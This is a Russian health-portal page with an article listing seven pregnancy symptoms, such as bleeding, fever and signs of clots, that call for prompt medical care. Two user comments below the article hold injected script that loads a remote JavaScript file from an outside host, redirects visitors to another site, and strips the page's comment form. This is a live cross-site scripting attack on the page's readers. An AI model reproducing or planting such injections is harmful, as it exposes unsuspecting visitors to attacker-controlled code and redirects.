Здоровье ИНФО
Присоединяйтесь к нам:
Главная страница  >>  Наша кожа  >>  Прыщи  >>  Статьи  >>  Беременность. Когда бежат...  >>  Беременность. Когда бежать к врачу
 
Обратная связь
 

Беременность. Когда бежать к врачу

Размер шрифта
04 ноября 2013 00:00
  • google_analytics: false
  • Нравится

Из нашей статьи вы узнаете, какие симптомы во время беременности требуют немедленного обращения к врачу.

Беременность. Когда бежать к врачу

Во время беременности в организме женщины происходят определенные физиологические изменения, которые необходимы для развития плода. В связи с этим у женщин, особенно во время первой беременности, возникает масса вопросов: нормально ли то, что со мной происходит? Не нужно ли обратиться к врачу?

Беременность – это как раз тот случай, когда лучше перестраховаться: если вы сомневаетесь, обратитесь к врачу. Ниже представлены семь симптомов, которые вне всяких сомнений требуют медицинской помощи.

1. Маточное кровотечение

Что это значит: маточное кровотечение может быть признаком выкидыша или эктопической беременности. Если кровотечение сопровождается болью в животе, которая наблюдается во время менструаций, скорее всего, это выкидыш. Если кровотечение сопровождается острой болью внизу живота, скорее всего, это эктопическая беременность.

Что делать: немедленно вызвать скорую помощь. При начинающемся выкидыше беременность можно сохранить, а эктопическая беременность требует экстренного хирургического вмешательства.

2. Выраженная тошнота и рвота

Тошнота и рвота наблюдаются в норме в первом триместре беременности. Однако если симптомы становятся невыносимыми, а постоянная рвота приводит к обезвоживанию, необходимо обратиться к врачу.

Что это значит: рвота, которая нарушает повседневную активность, может привести к снижению массы тела, головокружению, обезвоживанию и электролитным нарушениям.

Что делать: обратиться к врачу и рассказать ему о том, что беспокоит. Возможно, потребуется госпитализация и назначение определенных препаратов.

3. Высокая температура

Что это значит: высокая температура (выше 38°C) указывает на наличие инфекции, которая может повредить ребенку. Если повышение температуры сопровождается сыпью и болью в суставах, причиной инфекции может быть цитомегаловирус, токсоплазма и парвовирус. Цитомегаловирус является основной причиной врожденной глухоты.

Что делать: вызвать врача и рассказать о том, что беспокоит: повышение температуры, насморк, кашель, боль в мышцах, сыпь, боль в суставах.

4. Выделения и зуд во влагалище

В норме наблюдается небольшое количество выделений из влагалища. Увеличение количества выделений или изменение их характера может указывать на наличие инфекции, передаваемой половым путем.

Что это значит: инфекция может повредить ребенку.

Что делать: обратиться к врачу, пройти соответствующее обследование и, при необходимости, лечение.

5. Боль или жжение во время мочеиспускания

Что это значит: боль или жжение во время мочеиспускания могут быть симптомами инфекции мочевого пузыря или мочевыводящих путей. При отсутствии лечения заболевание может привести к осложнениям и стать причиной преждевременных родов.

Что делать: обратиться к врачу, пройти соответствующее обследование и, при необходимости, лечение.

6. Боль в ноге, односторонний отек ноги, сильная головная боль

Что это значит: во время беременности повышается риск образования тромбов. Боль в ноге и отек могут указывать на венозный тромбоз. В некоторых случаях тромб отрывается и попадает в легочную артерию, что может закончиться летальным исходом. Если тромб находится в мозговой артерии, то может появиться сильная головная боль.

Что делать: немедленно вызвать скорую помощь.

7. Обострение хронических заболеваний

Женщины, имеющие хронические заболевания (заболевания щитовидной железы, сахарный диабет, артериальная гипертензия, бронхиальная астма, системная красная волчанка), должны внимательно следить за своим состоянием во время беременности.

Что это значит: обострение хронического заболевания представляет угрозу не только для здоровья беременной женщины, но и для здоровья ее ребенка. Например, высокое или низкое содержание гормонов щитовидной железы, а также повышенный уровень сахара в крови повышает риск выкидыша.

Что делать: обратиться к врачу, пройти соответствующее обследование и, при необходимости, лечение.

Вся информация о беременности и родах в нашем специальном проекте «Ребенок будет».

  • google_analytics: false
  • Нравится
Послать другу Послать другу Распечатать Распечатать Обсудить на форуме Обсудить на форуме
Комментарии

1 - zzzzzz

30 июня 2015 в 18:57

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js">

2 - zzzzzz

30 июня 2015 в 22:55

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js"> > window.location.href="http://a25832-hostde3.fornex.org/"; $("form.noprint, #CommentsBlock").remove();

Статьи

       
Курите? Даже у ваших правнуков будет астма!   Беременность: как обезопасить себя и будущего малыша от вирусов   Худшая еда для беременной   Курение во время беременности сделает вашего ребенка шизофреником  
03 октября 2013Результаты благотворительного марафона «Всем миром» 10 июля 2013От того, что ест беременная женщина, зависит ум ее ребенка
 
08 июля 2013Теперь можно выбрать, какой ребенок у вас будет! ЭКО открывает новые горизонты 18 июня 2013Повезло, живете в пешей доступности от шоссе? Не так быстро! Чем ближе к шоссе, тем больнее почки! Как защитить себя?
 

Слайдшоу

1
Можно ли пережить беременность без рвоты?
Что делать, когда тошнит?
Можно ли подгадать с беременностью?

Тесты

1
Кофеин вызывает зависимость?
Будет ли у вас инфаркт?
Что вы знаете о груди?
Вопросы и ответы
Яна Александровна Юцковская
Яна Александровна Юцковская Задать вопрос
Посмотреть информацию о враче

Юцковская Яна Александровна, д.м.н., профессор, зав. кафедрой дерматовенерологии и косметологии ГБОУ ВПО «ТГМУ Минздрава России», врач высшей категории, директор ООО «Профессорская клиника Юцковских», Владивосток, директор ООО «Клиника профессора  Юцковской», Москва, президент НП «ДВАЭМ», председатель Дальневосточного отделения МООСБТ.

Елена Николаевна Волкова
Елена Николаевна Волкова Прочитать ответы
Посмотреть информацию о враче

Доктор медицинских наук, профессор кафедры дерматовенерологии Московского факультета ГОУ ВПО «РГМУ им. Н.И. Пирогова Минздравсоцразвития России». Этот консультант отвечал на вопросы пользователей с 03 ноября 2011 г. по 15 февраля 2012 г.